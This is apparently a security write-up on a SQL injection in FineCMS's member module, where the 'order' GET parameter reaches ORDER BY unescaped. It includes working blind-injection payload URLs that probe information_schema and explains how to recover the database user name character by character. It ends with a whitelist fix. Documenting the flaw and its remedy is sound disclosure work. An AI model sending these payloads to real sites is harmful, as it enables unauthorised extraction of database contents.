One line of FineCMS code triggers multiple SQL injections

Source: Internet
Author: User


Location:


/Dayrui/core/D_Member_Home.php, line 81:

$order = isset($_GET['order']) && strpos($_GET['order'], "undefined") !== 0 ? $this->input->get('order', TRUE) : 'updatetime desc';

Then at line 109 of the same file:


$this->link->order_by($order);



$order comes straight from $_GET and is passed into ORDER BY, which gives SQL injection. The only check is that the value does not start with the string "undefined"; $this->input->get('order', TRUE) applies CodeIgniter's XSS filter, which does nothing against SQL, and order_by() does not escape an argument that contains a parenthesis (CodeIgniter's _protect_identifiers() treats such a value as a function call and returns it untouched), which is why the working payloads below are parenthesised subqueries.

Because several classes inherit from D_Member_Home, the same injection is reachable from many features, including the various sub-modules of FineCMS.

 

Take the news module as an example.

First, to make the database error visible, modify /dayrui/core/D_Common.php line 304:


if ($this->member['adminid'] || IS_ADMIN || 1) {
    $this->db->db_debug = $this->site[SITE_ID]->db_debug = TRUE;
} else {
    $this->db->db_debug = $this->site[SITE_ID]->db_debug = FALSE;
}



Appending || 1 after IS_ADMIN forces database debugging on for every request. Now request http://xxxx/member/index.php?s=news&c=home&kw=&order=aaaa'

The following error is reported:

 



By default, however, db_debug is off and no error is displayed. Apart from time-based blind injection inside ORDER BY, what other injection method is available?

In CodeIgniter's ActiveRecord, a query that fails returns FALSE instead of a result object, so the result() or result_array() call that follows it raises a fatal error: Call to a member function result_array() on a non-object, and PHP stops executing the script. Therefore, even with error_reporting(0) set or display_errors disabled, we can tell whether the SQL statement executed successfully by checking whether the page was rendered completely.

That gives us a blind injection condition: the page produced by a failing query differs from the page produced by a correct one.



Enough explanation. Here are the payloads:


Error (page truncated): http://xxx/member/index.php?s=news&c=home&kw=&order=(select 1 from information_schema.tables where ord(mid(user() from 1 for 1))>113)

Correct (page complete): http://xxx/member/index.php?s=news&c=home&kw=&order=(select 1 from information_schema.tables where ord(mid(user() from 1 for 1))>114)


Both URLs place a scalar subquery into ORDER BY and use the number of rows it returns to decide whether the statement errors. When a scalar subquery returns more than one row, MySQL raises "Subquery returns more than 1 row". The database user here begins with 'r' (ord('r') = 114): for > 113 the WHERE condition is true for every row of information_schema.tables, the subquery returns many rows, the statement fails and PHP dies with the fatal error above; for > 114 the condition is false, the subquery returns no rows (NULL), ORDER BY NULL is harmless, and the page renders normally. Repeating this with a binary search over the threshold, and advancing the position one character at a time, recovers user() in full.

Solution:

Stricter filtering of the order parameter: validate it against a whitelist of permitted column names and directions (ASC/DESC) and fall back to the default 'updatetime desc' for anything else, rather than passing the raw value to order_by().
